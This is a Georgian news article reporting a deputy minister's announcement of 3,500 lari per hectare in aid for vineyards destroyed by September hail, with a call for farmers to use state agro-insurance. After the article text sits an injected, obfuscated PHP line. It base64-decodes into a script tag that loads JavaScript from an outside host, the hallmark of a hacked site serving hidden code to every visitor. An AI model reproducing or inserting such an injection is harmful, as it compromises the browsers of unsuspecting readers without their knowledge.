celsiusi
ავერსი საქკაბელი

გარემოს დაცვისა და სოფლის მეურნეობის მინისტრის მოადგილემ, თენგიზ ნასარიძემ, მთავრობის სხდომის დასრულების შემდეგ, მედიის წარმომადგენლებთან გამართულ შეხვედრაზე მთავრობის გადაწყვეტილების შესახებ გააკეთა განმარტება და აღნიშნა, რომ ყველა მევენახე, ვისაც სტიქიისგან სრულად დაუზიანდა ყურძენი, ერთ ჰექტარზე 3500 ლარის ოდენობით დახმარებას მიიღებს. 

„მოგეხსენებათ, რთველი საკმაოდ აქტიურ ფაზაშია შესული. საკმაოდ წარმატებულად და ორგანიზებულად მიმდინარეობს პროცესი. დღეისათვის, გადამუშავებულია, დაახლოებით, 180 ათასი ტონა ყურძენი. 13 ათას მევენახეს ყურძენი უკვე ჩაბარებული აქვს; მათი შემოსავალი, დაახლოებით, 200 მილიონი ლარია. თუმცა, სამწუხაროდ, პარალელურად ამ პროცესისა, ბოლო პერიოდში გააქტიურებულმა სტიქიურმა მოვლენებმა, ამ დარგსაც მიაყენა სერიოზული ზიანი. 2 სექტემბრის და 17 სექტემბრის სეტყვის შედეგად, დაახლოებით, 6 ათას ჰექტრამდე ვენახის ფართობი იქნა დაზიანებული. ამ ფართობიდან, საბედნიეროდ, გარკვეული რაოდენობა, თითქმის ნახევარი, იყო დაზღვეული, რაც ძალიან კარგია, თუმცა, გარკვეული ფაქტორების გათვალისწინებით, დანარჩენი ფართობის მესაკუთრეებს ვენახი დაზღვეული არ ჰქონდათ, შესაბამისად, მთავრობის გადაწყვეტილებით, შემუშავებულია მექანიზმი, რათა ყველა მევენახე, ვისაც სრულად დაუზიანდა ყურძენი, ერთ ჰექტარზე 3500 ლარის ოდენობით დახმარებას მიიღებს, რაც ვფიქრობთ, რომ ძალიან მნიშვნელოვანი თანადგომა იქნება მათთვის. მიზნობრივად უნდა მოხდეს ამ თანხის გამოყენება ვენახის მოვლის საშუალებებში, რათა მევენახეებმა შეძლონ საქმიანობის გაგრძელება, ვენახის გადარჩენა და შემდგომში აქტიური წვლილის შეტანა იმ მნიშვნელოვან პროცესში, რასაც ქართული მევენახეობის განვითარება ჰქვია“, - განაცხადა თენგიზ ნასარიძემ.
 
მინისტრის მოადგილემ ხაზგასმით აღნიშნა, რომ ერთადერთი ყველაზე ეფექტიანი მექანიზმი სტაბილური სასოფლო-სამეურნეო საქმიანობისთვის არის აგროდაზღვევა და მოუწოდა ფერმერებს ისარგებლონ აგროდაზღვევის სახელმწიფო პროგრამით.

613
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");